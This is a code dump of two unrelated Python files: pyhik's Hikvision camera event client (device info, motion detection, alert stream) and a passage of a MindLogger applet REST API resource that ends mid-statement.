hikvision.py
"""
pyhik.hikvision
~~~~~~~~~~~~~~~~~~~~
Provides api for Hikvision events
Copyright (c) 2016-2020 John Mihalic <https://github.com/mezz64>
Licensed under the MIT license.
Based on the following api documentation:
System:
http://oversea-download.hikvision.com/uploadfile/Leaflet/ISAPI/HIKVISION%20ISAPI_2.0-IPMD%20Service.pdf
Imaging:
http://oversea-download.hikvision.com/uploadfile/Leaflet/ISAPI/HIKVISION%20ISAPI_2.0-Image%20Service.pdf
"""
import time
import datetime
import logging
import uuid
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import threading
import requests
from requests.auth import HTTPDigestAuth
# Make pydispatcher optional to support legacy implementations
# New usage should implement the event_callback
try:
from pydispatch import dispatcher
except ImportError:
dispatcher = None
from pyhik.watchdog import Watchdog
from pyhik.constants import (
DEFAULT_PORT, DEFAULT_HEADERS, XML_NAMESPACE, SENSOR_MAP,
CAM_DEVICE, NVR_DEVICE, CONNECT_TIMEOUT, READ_TIMEOUT, CONTEXT_INFO,
CONTEXT_TRIG, CONTEXT_MOTION, CONTEXT_ALERT, CHANNEL_NAMES, ID_TYPES,
__version__)
_LOGGING = logging.getLogger(__name__)
# Hide nuisance requests logging
logging.getLogger('urllib3').setLevel(logging.ERROR)
"""
Things still to do:
- Support status of day/night and switching
IR switch URL:
http://X.X.X.X/ISAPI/Image/channels/1/ircutFilter
report IR status and allow switching
"""
# pylint: disable=too-many-instance-attributes
class HikCamera(object):
"""Creates a new Hikvision api device."""
def __init__(self, host=None, port=DEFAULT_PORT,
usr=None, pwd=None):
"""Initialize device."""
_LOGGING.debug("pyHik %s initializing new hikvision device at: %s",
__version__, host)
self.event_states = {}
self.watchdog = Watchdog(300.0, self.watchdog_handler)
if not host:
_LOGGING.error('Host not specified! Cannot continue.')
return
self.host = host
self.usr = usr
self.pwd = pwd
self.cam_id = 0
self.name = ''
self.device_type = None
self.motion_detection = None
self._motion_detection_xml = None
self.root_url = '{}:{}'.format(host, port)
self.namespace = {
CONTEXT_INFO: None,
CONTEXT_TRIG: None,
CONTEXT_ALERT: None,
CONTEXT_MOTION: None
}
# Build requests session for main thread calls
# Default to basic authentication. It will change to digest inside
# get_device_info if basic fails
self.hik_request = requests.Session()
self.hik_request.auth = (usr, pwd)
self.hik_request.headers.update(DEFAULT_HEADERS)
# Define event stream processing thread
self.kill_thrd = threading.Event()
self.reset_thrd = threading.Event()
self.thrd = threading.Thread(
target=self.alert_stream, args=(self.reset_thrd, self.kill_thrd,))
self.thrd.daemon = False
# Callbacks
self._updateCallbacks = []
self.initialize()
@property
def get_id(self):
"""Returns unique camera/nvr identifier."""
return self.cam_id
@property
def get_name(self):
"""Return camera/nvr name."""
return self.name
@property
def get_type(self):
"""Return device type."""
return self.device_type
@property
def current_event_states(self):
"""Return Event states dictionary"""
return self.event_states
@property
def current_motion_detection_state(self):
"""Return current state of motion detection property"""
return self.motion_detection
def get_motion_detection(self):
"""Fetch current motion state from camera"""
url = ('%s/ISAPI/System/Video/inputs/'
'channels/1/motionDetection') % self.root_url
try:
response = self.hik_request.get(url, timeout=CONNECT_TIMEOUT)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch MotionDetection, error: %s', err)
self.motion_detection = None
return self.motion_detection
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
self.motion_detection = None
return self.motion_detection
if response.status_code != requests.codes.ok:
# If we didn't receive 200, abort
_LOGGING.debug('Unable to fetch motion detection.')
self.motion_detection = None
return self.motion_detection
try:
tree = ET.fromstring(response.text)
self.fetch_namespace(tree, CONTEXT_MOTION)
enabled = tree.find(self.element_query('enabled', CONTEXT_MOTION))
if enabled is not None:
self._motion_detection_xml = tree
self.motion_detection = {'true': True, 'false': False}[enabled.text]
return self.motion_detection
except AttributeError as err:
_LOGGING.error('Entire response: %s', response.text)
_LOGGING.error('There was a problem: %s', err)
self.motion_detection = None
return self.motion_detection
def enable_motion_detection(self):
"""Enable motion detection"""
self._set_motion_detection(True)
def disable_motion_detection(self):
"""Disable motion detection"""
self._set_motion_detection(False)
def _set_motion_detection(self, enable):
"""Set desired motion detection state on camera"""
url = ('%s/ISAPI/System/Video/inputs/'
'channels/1/motionDetection') % self.root_url
enabled = self._motion_detection_xml.find(self.element_query('enabled', CONTEXT_MOTION))
if enabled is None:
_LOGGING.error("Couldn't find 'enabled' in the xml")
_LOGGING.error('XML: %s', ET.tostring(self._motion_detection_xml))
return
enabled.text = 'true' if enable else 'false'
xml = ET.tostring(self._motion_detection_xml)
try:
response = self.hik_request.put(url, data=xml, timeout=CONNECT_TIMEOUT)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to set MotionDetection, error: %s', err)
return
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
return
        if response.status_code != requests.codes.ok:
            # If we didn't receive 200, abort
            _LOGGING.error('Unable to set motion detection: %s', response.text)
            return
        self.motion_detection = enable
def add_update_callback(self, callback, sensor):
"""Register as callback for when a matching device sensor changes."""
self._updateCallbacks.append([callback, sensor])
_LOGGING.debug('Added update callback to %s on %s', callback, sensor)
def _do_update_callback(self, msg):
"""Call registered callback functions."""
for callback, sensor in self._updateCallbacks:
if sensor == msg:
_LOGGING.debug('Update callback %s for sensor %s',
callback, sensor)
callback(msg)
def element_query(self, element, context):
"""Build tree query for a given element and context."""
if context == CONTEXT_INFO:
return '{%s}%s' % (self.namespace[CONTEXT_INFO], element)
elif context == CONTEXT_TRIG:
return '{%s}%s' % (self.namespace[CONTEXT_TRIG], element)
elif context == CONTEXT_ALERT:
return '{%s}%s' % (self.namespace[CONTEXT_ALERT], element)
elif context == CONTEXT_MOTION:
return '{%s}%s' % (self.namespace[CONTEXT_MOTION], element)
else:
return '{%s}%s' % (XML_NAMESPACE, element)
def fetch_namespace(self, tree, context):
"""Determine proper namespace to find given element."""
if context == CONTEXT_INFO:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_INFO] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device info namespace: %s', self.namespace[CONTEXT_INFO])
elif context == CONTEXT_TRIG:
try:
# For triggers we *typically* only care about the sub-namespace
nmsp = tree[0][1].tag.split('}')[0].strip('{')
except IndexError:
                # If we get an IndexError, check the top level
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_TRIG] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device triggers namespace: %s', self.namespace[CONTEXT_TRIG])
elif context == CONTEXT_ALERT:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_ALERT] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device alerts namespace: %s', self.namespace[CONTEXT_ALERT])
elif context == CONTEXT_MOTION:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_MOTION] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device motion namespace: %s', self.namespace[CONTEXT_MOTION])
def initialize(self):
"""Initialize deviceInfo and available events."""
device_info = self.get_device_info()
if device_info is None:
self.name = None
self.cam_id = None
self.event_states = None
return
for key in device_info:
if key == 'deviceName':
self.name = device_info[key]
elif key == 'deviceID':
if len(device_info[key]) > 10:
self.cam_id = device_info[key]
else:
self.cam_id = uuid.uuid4()
events_available = self.get_event_triggers()
if events_available:
for event, channel_list in events_available.items():
for channel in channel_list:
try:
self.event_states.setdefault(
SENSOR_MAP[event.lower()], []).append(
[False, channel, 0, datetime.datetime.now()])
except KeyError:
# Sensor type doesn't have a known friendly name
# We can't reliably handle it at this time...
_LOGGING.warning(
'Sensor type "%s" is unsupported.', event)
_LOGGING.debug('Initialized Dictionary: %s', self.event_states)
else:
_LOGGING.debug('No Events available in dictionary.')
self.get_motion_detection()
def get_device_info(self):
"""Parse deviceInfo into dictionary."""
device_info = {}
url = '%s/ISAPI/System/deviceInfo' % self.root_url
using_digest = False
try:
response = self.hik_request.get(url, timeout=CONNECT_TIMEOUT)
if response.status_code == requests.codes.unauthorized:
_LOGGING.debug('Basic authentication failed. Using digest.')
self.hik_request.auth = HTTPDigestAuth(self.usr, self.pwd)
using_digest = True
response = self.hik_request.get(url)
if response.status_code == requests.codes.not_found:
# Try alternate URL for deviceInfo
_LOGGING.debug('Using alternate deviceInfo URL.')
url = '%s/System/deviceInfo' % self.root_url
response = self.hik_request.get(url)
            # Cameras and NVRs differ here; they can't seem to agree
            # on whether to return 404 or 401 first.
if not using_digest and response.status_code == requests.codes.unauthorized:
_LOGGING.debug('Basic authentication failed. Using digest.')
self.hik_request.auth = HTTPDigestAuth(self.usr, self.pwd)
using_digest = True
response = self.hik_request.get(url)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch deviceInfo, error: %s', err)
return None
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
return None
if response.status_code != requests.codes.ok:
# If we didn't receive 200, abort
_LOGGING.debug('Unable to fetch device info.')
return None
try:
tree = ET.fromstring(response.text)
self.fetch_namespace(tree, CONTEXT_INFO)
for item in tree:
tag = item.tag.split('}')[1]
device_info[tag] = item.text
return device_info
except AttributeError as err:
_LOGGING.error('Entire response: %s', response.text)
_LOGGING.error('There was a problem: %s', err)
return None
def get_event_triggers(self, base_url="default"):
"""
Returns dict of supported events.
Key = Event Type
List = Channels that have that event activated
"""
events = {}
nvrflag = False
event_xml = []
if base_url == "default":
url = '%s/ISAPI/Event/triggers' % self.root_url
else:
url = '%s/Event/triggers' % self.root_url
try:
response = self.hik_request.get(url, timeout=CONNECT_TIMEOUT)
            if response.status_code != requests.codes.ok and base_url == "default":
                # Try the alternate triggers URL before giving up.
                _LOGGING.debug('Trying alternate triggers URL.')
                return self.get_event_triggers("alt")
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch events, error: %s', err)
return None
if response.status_code != 200:
            # If we didn't receive 200, abort
return None
# pylint: disable=too-many-nested-blocks
try:
content = ET.fromstring(response.text)
self.fetch_namespace(content, CONTEXT_TRIG)
            if content[0].find(self.element_query('EventTrigger', CONTEXT_TRIG)) is not None:
event_xml = content[0].findall(
self.element_query('EventTrigger', CONTEXT_TRIG))
            elif content.find(self.element_query('EventTrigger', CONTEXT_TRIG)) is not None:
# This is either an NVR or a rebadged camera
event_xml = content.findall(
self.element_query('EventTrigger', CONTEXT_TRIG))
for eventtrigger in event_xml:
ettype = eventtrigger.find(self.element_query('eventType', CONTEXT_TRIG))
                # Catch empty xml definitions
if ettype is None:
break
etnotify = eventtrigger.find(
self.element_query('EventTriggerNotificationList', CONTEXT_TRIG))
etchannel = None
etchannel_num = 0
for node_name in CHANNEL_NAMES:
etchannel = eventtrigger.find(
self.element_query(node_name, CONTEXT_TRIG))
if etchannel is not None:
try:
# Need to make sure this is actually a number
etchannel_num = int(etchannel.text)
if etchannel_num > 1:
# Must be an nvr
nvrflag = True
break
except ValueError:
# Field must not be an integer
pass
                if etnotify is not None:
for notifytrigger in etnotify:
ntype = notifytrigger.find(
self.element_query('notificationMethod', CONTEXT_TRIG))
if ntype.text == 'center' or ntype.text == 'HTTP':
"""
If we got this far we found an event that we want
to track.
"""
events.setdefault(ettype.text, []) \
.append(etchannel_num)
except (AttributeError, ET.ParseError) as err:
_LOGGING.error(
'There was a problem finding an element: %s', err)
return None
if nvrflag:
self.device_type = NVR_DEVICE
else:
self.device_type = CAM_DEVICE
_LOGGING.debug('Processed %s as %s Device.',
self.cam_id, self.device_type)
_LOGGING.debug('Found events: %s', events)
self.hik_request.close()
return events
def watchdog_handler(self):
"""Take care of threads if wachdog expires."""
_LOGGING.debug('%s Watchdog expired. Resetting connection.', self.name)
self.watchdog.stop()
self.reset_thrd.set()
def disconnect(self):
"""Disconnect from event stream."""
_LOGGING.debug('Disconnecting from stream: %s', self.name)
self.kill_thrd.set()
self.thrd.join()
_LOGGING.debug('Event stream thread for %s is stopped', self.name)
self.kill_thrd.clear()
def start_stream(self):
"""Start thread to process event stream."""
# self.watchdog.start()
self.thrd.start()
def alert_stream(self, reset_event, kill_event):
"""Open event stream."""
_LOGGING.debug('Stream Thread Started: %s, %s', self.name, self.cam_id)
start_event = False
parse_string = ""
fail_count = 0
url = '%s/ISAPI/Event/notification/alertStream' % self.root_url
# pylint: disable=too-many-nested-blocks
while True:
try:
stream = self.hik_request.get(url, stream=True,
timeout=(CONNECT_TIMEOUT,
READ_TIMEOUT))
if stream.status_code == requests.codes.not_found:
# Try alternate URL for stream
url = '%s/Event/notification/alertStream' % self.root_url
stream = self.hik_request.get(url, stream=True)
if stream.status_code != requests.codes.ok:
                    raise ValueError('Connection unsuccessful.')
else:
_LOGGING.debug('%s Connection Successful.', self.name)
fail_count = 0
self.watchdog.start()
for line in stream.iter_lines():
# _LOGGING.debug('Processing line from %s', self.name)
# filter out keep-alive new lines
if line:
str_line = line.decode("utf-8", "ignore")
                            # New events start with --boundary
if str_line.find('<EventNotificationAlert') != -1:
# Start of event message
start_event = True
parse_string = str_line
elif str_line.find('</EventNotificationAlert>') != -1:
                                # Message end found
parse_string += str_line
start_event = False
if parse_string:
try:
tree = ET.fromstring(parse_string)
self.process_stream(tree)
self.update_stale()
                                    except ET.ParseError as err:
                                        _LOGGING.warning('XML parse error in stream: %s', err)
parse_string = ""
else:
if start_event:
parse_string += str_line
if kill_event.is_set():
# We were asked to stop the thread so lets do so.
break
elif reset_event.is_set():
# We need to reset the connection.
raise ValueError('Watchdog failed.')
if kill_event.is_set():
# We were asked to stop the thread so lets do so.
_LOGGING.debug('Stopping event stream thread for %s',
self.name)
self.watchdog.stop()
self.hik_request.close()
return
elif reset_event.is_set():
# We need to reset the connection.
raise ValueError('Watchdog failed.')
except (ValueError,
requests.exceptions.ConnectionError,
requests.exceptions.ChunkedEncodingError) as err:
fail_count += 1
reset_event.clear()
_LOGGING.warning('%s Connection Failed (count=%d). Waiting %ss. Err: %s',
self.name, fail_count, (fail_count * 5) + 5, err)
parse_string = ""
self.watchdog.stop()
self.hik_request.close()
time.sleep(5)
self.update_stale()
time.sleep(fail_count * 5)
continue
def process_stream(self, tree):
"""Process incoming event stream packets."""
if not self.namespace[CONTEXT_ALERT]:
self.fetch_namespace(tree, CONTEXT_ALERT)
try:
etype = SENSOR_MAP[tree.find(
self.element_query('eventType', CONTEXT_ALERT)).text.lower()]
estate = tree.find(
self.element_query('eventState', CONTEXT_ALERT)).text
for idtype in ID_TYPES:
echid = tree.find(self.element_query(idtype, CONTEXT_ALERT))
if echid is not None:
try:
# Need to make sure this is actually a number
echid = int(echid.text)
break
except (ValueError, TypeError) as err:
# Field must not be an integer or is blank
pass
ecount = tree.find(
self.element_query('activePostCount', CONTEXT_ALERT)).text
except (AttributeError, KeyError, IndexError) as err:
_LOGGING.error('Problem finding attribute: %s', err)
return
# Take care of keep-alive
if len(etype) > 0 and etype == 'Video Loss':
self.watchdog.pet()
# Track state if it's in the event list.
if len(etype) > 0:
state = self.fetch_attributes(etype, echid)
if state:
# Determine if state has changed
# If so, publish, otherwise do nothing
estate = (estate == 'active')
old_state = state[0]
attr = [estate, echid, int(ecount),
datetime.datetime.now()]
self.update_attributes(etype, echid, attr)
if estate != old_state:
self.publish_changes(etype, echid)
self.watchdog.pet()
def update_stale(self):
"""Update stale active statuses"""
# Some events don't post an inactive XML, only active.
# If we don't get an active update for 5 seconds we can
# assume the event is no longer active and update accordingly.
for etype, echannels in self.event_states.items():
for eprop in echannels:
if eprop[3] is not None:
sec_elap = ((datetime.datetime.now()-eprop[3])
.total_seconds())
# print('Seconds since last update: {}'.format(sec_elap))
if sec_elap > 5 and eprop[0] is True:
_LOGGING.debug('Updating stale event %s on CH(%s)',
etype, eprop[1])
attr = [False, eprop[1], eprop[2],
datetime.datetime.now()]
self.update_attributes(etype, eprop[1], attr)
self.publish_changes(etype, eprop[1])
def publish_changes(self, etype, echid):
"""Post updates for specified event type."""
_LOGGING.debug('%s Update: %s, %s',
self.name, etype, self.fetch_attributes(etype, echid))
signal = 'ValueChanged.{}'.format(self.cam_id)
sender = '{}.{}'.format(etype, echid)
if dispatcher:
dispatcher.send(signal=signal, sender=sender)
self._do_update_callback('{}.{}.{}'.format(self.cam_id, etype, echid))
def fetch_attributes(self, event, channel):
"""Returns attribute list for a given event/channel."""
try:
for sensor in self.event_states[event]:
if sensor[1] == int(channel):
return sensor
except KeyError:
return None
def update_attributes(self, event, channel, attr):
"""Update attribute list for current event/channel."""
try:
for i, sensor in enumerate(self.event_states[event]):
if sensor[1] == int(channel):
self.event_states[event][i] = attr
except KeyError:
_LOGGING.debug('Error updating attributes for: (%s, %s)',
event, channel)
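
# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). The host,
# credentials, and sensor key below are placeholders; the callback key format
# '<cam_id>.<event type>.<channel>' mirrors what publish_changes() passes to
# _do_update_callback() above.
#
# def motion_changed(msg):
#     print('Sensor update:', msg)
#
# cam = HikCamera('http://192.168.1.64', port=80, usr='admin', pwd='password')
# cam.add_update_callback(motion_changed, '{}.Motion.1'.format(cam.get_id))
# cam.start_stream()
# ...  # events are delivered to the callback until we disconnect
# cam.disconnect()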
applet.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import itertools
import re
import threading
import uuid
import requests
from datetime import datetime
from ..describe import Description, autoDescribeRoute
from ..rest import Resource, rawResponse
from bson.objectid import ObjectId
from girderformindlogger.constants import AccessType, SortDir, TokenScope, \
DEFINED_INFORMANTS, REPROLIB_CANONICAL, SPECIAL_SUBJECTS, USER_ROLES
from girderformindlogger.api import access
from girderformindlogger.exceptions import AccessException, ValidationException
from girderformindlogger.models.activity import Activity as ActivityModel
from girderformindlogger.models.applet import Applet as AppletModel
from girderformindlogger.models.collection import Collection as CollectionModel
from girderformindlogger.models.folder import Folder as FolderModel
from girderformindlogger.models.group import Group as GroupModel
from girderformindlogger.models.item import Item as ItemModel
from girderformindlogger.models.protocol import Protocol as ProtocolModel
from girderformindlogger.models.roles import getCanonicalUser, getUserCipher
from girderformindlogger.models.user import User as UserModel
from girderformindlogger.models.pushNotification import PushNotification as PushNotificationModel
from girderformindlogger.utility import config, jsonld_expander
from pyld import jsonld
USER_ROLE_KEYS = USER_ROLES.keys()
class Applet(Resource):
def __init__(self):
super(Applet, self).__init__()
self.resourceName = 'applet'
self._model = AppletModel()
self.route('GET', (':id',), self.getApplet)
self.route('GET', (':id', 'data'), self.getAppletData)
self.route('GET', (':id', 'groups'), self.getAppletGroups)
self.route('POST', (), self.createApplet)
self.route('PUT', (':id', 'informant'), self.updateInformant)
self.route('PUT', (':id', 'assign'), self.assignGroup)
self.route('PUT', (':id', 'constraints'), self.setConstraints)
self.route('PUT', (':id', 'schedule'), self.setSchedule)
self.route('GET', (':id',), self.getSchedule)
self.route('POST', (':id', 'invite'), self.invite)
self.route('GET', (':id', 'roles'), self.getAppletRoles)
self.route('GET', (':id', 'users'), self.getAppletUsers)
self.route('DELETE', (':id',), self.deactivateApplet)
@access.user(scope=TokenScope.DATA_OWN)
@autoDescribeRoute(
Description('Get userlist, groups & statuses.')
.modelParam(
'id',
model=FolderModel,
level=AccessType.ADMIN,
destName='applet'
)
)
def getAppletUsers(self, applet):
thisUser=self.getCurrentUser()
if AppletModel().isCoordinator(applet['_id'], thisUser):
return(AppletModel().getAppletUsers(applet, thisUser, force=True))
else:
raise AccessException(
"Only coordinators and managers can see user lists."
)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Assign a group to a role in an applet.')
.deprecated()
.responseClass('Folder')
.modelParam('id', model=FolderModel, level=AccessType.READ)
.param(
'group',
'ID of the group to assign.',
required=True,
strip=True
)
.param(
'role',
'Role to invite this user to. One of ' + str(USER_ROLE_KEYS),
default='user',
required=False,
strip=True
)
.jsonParam(
'subject',
'Requires a JSON Object in the form \n```'
'{'
' "groups": {'
' "«relationship»": []'
' },'
' "users": {'
' "«relationship»": []'
' }'
'}'
'``` \n For \'user\' or \'reviewer\' assignments, specify '
'group-level relationships, filling in \'«relationship»\' with a '
'JSON-ld key semantically defined in in your context, and IDs in '
'the value Arrays (either applet-specific or canonical IDs in the '
'case of users; applet-specific IDs will be stored either way).',
paramType='form',
required=False,
requireObject=True
)
.errorResponse('ID was invalid.')
.errorResponse('Write access was denied for the folder or its new parent object.', 403)
)
def assignGroup(self, folder, group, role, subject):
applet = folder
if role not in USER_ROLE_KEYS:
raise ValidationException(
'Invalid role.',
'role'
)
thisUser=self.getCurrentUser()
group=GroupModel().load(group, level=AccessType.WRITE, user=thisUser)
return(
AppletModel().setGroupRole(
applet,
group,
role,
currentUser=thisUser,
force=False,
subject=subject
)
)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Create an applet.')
.param(
'protocolUrl',
'URL of Activity Set from which to create applet',
required=False
)
.param(
'name',
'Name to give the applet. The Protocol\'s name will be used if '
'this parameter is not provided.',
required=False
)
.param(
'informant',
' '.join([
'Relationship from informant to individual of interest.',
'Currently handled informant relationships are',
str([r for r in DEFINED_INFORMANTS.keys()])
]),
required=False
)
.errorResponse('Write access was denied for this applet.', 403)
)
def createApplet(self, protocolUrl=None, name=None, informant=None):
thisUser = self.getCurrentUser()
thread = threading.Thread(
target=AppletModel().createAppletFromUrl,
kwargs={
'name': name,
'protocolUrl': protocolUrl,
'user': thisUser,
'constraints': {
'informantRelationship': informant
} if informant is not None else None
}
)
thread.start()
return({
"message": "The applet is being created. Please check back in "
"several mintutes to see it. If you have an email "
"address associated with your account, you will receive "
"an email when your applet is ready."
})
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Get all data you are authorized to see for an applet.')
.param(
'id',
'ID of the applet for which to fetch data',
required=True
)
.param(
'format',
'JSON or CSV',
required=False
)
.errorResponse('Write access was denied for this applet.', 403)
)
def getAppletData(self, id, format='json'):
import pandas as pd
from datetime import datetime
from ..rest import setContentDisposition, setRawResponse, setResponseHeader
format = ('json' if format is None else format).lower()
thisUser = self.getCurrentUser()
data = AppletModel().getResponseData(id, thisUser)
setContentDisposition("{}-{}.{}".format(
str(id),
datetime.now().isoformat(),
format
))
if format=='csv':
setRawResponse()
setResponseHeader('Content-Type', 'text/{}'.format(format))
csv = pd.DataFrame(data).to_csv(index=False)
return(csv)
setResponseHeader('Content-Type', 'application/{}'.format(format))
return(data)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('(managers only) Update the informant of an applet.')
.modelParam(
'id',
model=AppletModel,
description='ID of the applet to update',
destName='applet',
force=True,
required=True
)
.param(
'informant',
' '.join([
'Relationship from informant to individual of interest.',
'Currently handled informant relationships are',
str([r for r in DEFINED_INFORMANTS.keys()])
]),
required=True
)
.errorResponse('Write access was denied for this applet.', 403)
)
def updateInformant(self, applet, informant):
user = self.getCurrentUser()
if not AppletModel().isManager(applet['_id'], user):
raise AccessException(
"Only managers can update informant relationship"
)
AppletModel().updateRelationship(applet, informant)
return(
jsonld_expander.formatLdObject(
applet,
'applet',
user,
refreshCache=False
)
)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Deactivate an applet by ID.')
.modelParam('id', model=AppletModel, level=AccessType.WRITE)
.errorResponse('Invalid applet ID.')
.errorResponse('Write access was denied for this applet.', 403)
)
def deactivateApplet(self, folder):
applet = folder
        user = self.getCurrentUser()
applet['meta']['applet']['deleted'] = True
applet = AppletModel().setMetadata(applet, applet.get('meta'), user)
if applet.get('meta', {}).get('applet', {}).get('deleted')==True:
message = 'Successfully deactivated applet {} ({}).'.format(
AppletModel().preferredName(applet),
applet.get('_id')
)
            thread = threading.Thread(
                target=AppletModel().updateAllUserCaches,
                args=(applet, user)
            )
            thread.start()
else:
message = 'Could not deactivate applet {} ({}).'.format(
AppletModel().preferredName(applet),
applet.get('_id')
)
Description().errorResponse(message, 403)
return(message)
@access.user(scope=TokenScope.DATA_READ)
@autoDescribeRoute(
Description('Get an applet by ID.')
.modelParam(
'id',
model=AppletModel,
level=AccessType.READ,
destName='applet'
)
.param(
'refreshCache',
'Reparse JSON-LD',
required=False,
dataType='boolean'
)
.errorResponse('Invalid applet ID.')
.errorResponse('Read access was denied for this applet.', 403)
)
def getApplet(self, applet, refreshCache=False):
user = self.getCurrentUser()
if refreshCache:
thread = threading.Thread(
target=jsonld_expander.formatLdObject,
args=(applet, 'applet', user),
kwargs={'refreshCache': refreshCache}
)
thread.start()
return({
"message": "The applet is being refreshed. Please check back "
"in several mintutes to see it."
})
return(
jsonld_expander.formatLdObject(
applet,
'applet',
user,
refreshCache=refreshCache
)
)
@access.user(scope=TokenScope.DATA_READ)
@autoDescribeRoute(
Description('Get associated groups for a given role and applet ID.')
.modelParam('id', 'ID of the Applet.', model=AppletModel, level=AccessType.READ)
.param(
'role',
'One of ' + str(set(USER_ROLE_KEYS)),
default='user',
required=False,
strip=True
)
.errorResponse('Invalid applet ID.')
.errorResponse('Read access was denied for this applet.', 403)
)
def getAppletGroups(self, folder, role):
applet = folder
user = self.getCurrentUser()
groups = [
group for group in AppletModel(
).getAppletGroups(applet).get(role) if ObjectId(group) in [
*user.get('groups', []),
*user.get('formerGroups', []),
*[invite['groupId'] for invite in [
*user.get('groupInvites', []),
*user.get('declinedInvites', [])
]]
]
]
return(
groups
)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Get roles for an applet by ID.')
.modelParam(
'id',
model=AppletModel,
level=AccessType.WRITE,
description='ID of the Applet.'
)
.errorResponse('Invalid applet ID.')
.errorResponse('Write access was denied for this applet.', 403)
.notes('Only users with write access can see roles.')
)
def getAppletRoles(self, folder):
applet = folder
        user = self.getCurrentUser()
return(AppletModel().getFullRolesList(applet))
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Invite a user to a role in an applet.')
.modelParam(
'id',
model=AppletModel,
level=AccessType.READ,
destName='applet'
)
.param(
'role',
'Role to invite this user to. One of ' + str(set(USER_ROLE_KEYS)),
default='user',
required=False,
strip=True
)
.param(
'idCode',
'ID code for data reporting. One will be generated if none is '
'provided.',
required=False,
strip=True
)
.jsonParam(
'profile',
            'Optional, coordinator-defined user profile information, e.g., '
'`displayName`, `email`',
required=False,
paramType='form'
)
.errorResponse('ID was invalid.')
.errorResponse('Write access was denied for the folder or its new parent object.', 403)
)
def invite(self, applet, role="user", idCode=None, profile=None):
from girderformindlogger.models.invitation import Invitation
from girderformindlogger.models.profile import Profile
user = self.getCurrentUser()
try:
if role not in USER_ROLE_KEYS:
raise ValidationException(
'Invalid role.',
'role'
)
invitation = Invitation().createInvitation(
applet=applet,
coordinator=user,
role=role,
profile=profile,
idCode=idCode
)
return(Profile().displayProfileFields(invitation, user))
        except Exception:
            import traceback
            traceback.print_exc()
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Deprecated. Do not use')
.modelParam('id', model=AppletModel, level=AccessType.READ)
.param(
'activity',
            'Deprecated. Do not use.',
required=False
)
.jsonParam(
'schedule',
'Deprecated. Do not use.',
paramType='form',
required=False
)
.errorResponse('Invalid applet ID.')
.errorResponse('Read access was denied for this applet.', 403)
.deprecated()
)
def setConstraints(self, folder, activity, schedule, **kwargs):
thisUser = self.getCurrentUser()
applet = jsonld_expander.formatLdObject(
_setConstraints(folder, activity, schedule, thisUser),
'applet',
thisUser,
refreshCache=True
)
thread = threading.Thread(
target=AppletModel().updateUserCacheAllUsersAllRoles,
args=(applet, thisUser)
)
thread.start()
return(applet)
@access.user(scope=TokenScope.DATA_READ)
@autoDescribeRoute(
Description('Get schedule information for an applet.')
.modelParam(
'id',
model=AppletModel,
level=AccessType.READ,
destName='applet'
)
.param(
'refreshCache',
'Reparse JSON-LD',
required=False,
dataType='boolean'
)
.errorResponse('Invalid applet ID.')
.errorResponse('Read access was denied for this applet.', 403)
)
def getSchedule(self, applet, refreshCache=False):
user = self.getCurrentUser()
if refreshCache:
thread = threading.Thread(
target=jsonld_expander.formatLdObject,
args=(applet, 'applet', user),
kwargs={'refreshCache': refreshCache}
)
thread.start()
return({
"message": "The applet is being refreshed. Please check back "
"in several mintutes to see it."
})
return(
jsonld_expander.formatLdObject(
applet,
'applet',
user,
refreshCache=refreshCache
)
)
@access.user(scope=TokenScope.DATA_WRITE)
@autoDescribeRoute(
Description('Set or update schedule information for an applet.')
.modelParam(
'id',
model=AppletModel,
level=AccessType.READ,
destName='applet'
)
.jsonParam(
'schedule',
'A JSON object containing schedule information for an applet',
paramType='form',
required=False
)
.errorResponse('Invalid applet ID.')
.errorResponse('Read access was denied for this applet.', 403)
)
def setSchedule(self, applet, schedule, **kwargs):
thisUser = self.getCurrentUser()
if not AppletModel().isCoordinator(applet['_id'], thisUser):
raise AccessException(
"Only coordinators and managers can update applet schedules."
)
if 'events' in schedule:
for event in schedule['events']:
if event['data']['useNotifications']:
if event['data']['notifications'][0]['start']:
sendTime = event['data']['notifications'][0]['start']
else:
sendTime = '09:00'
sendTime = (str(event['schedule']['year'][0]) + '/' +
('0' + str(event['schedule']['month'][0] + 1))[-2:] + '/' +
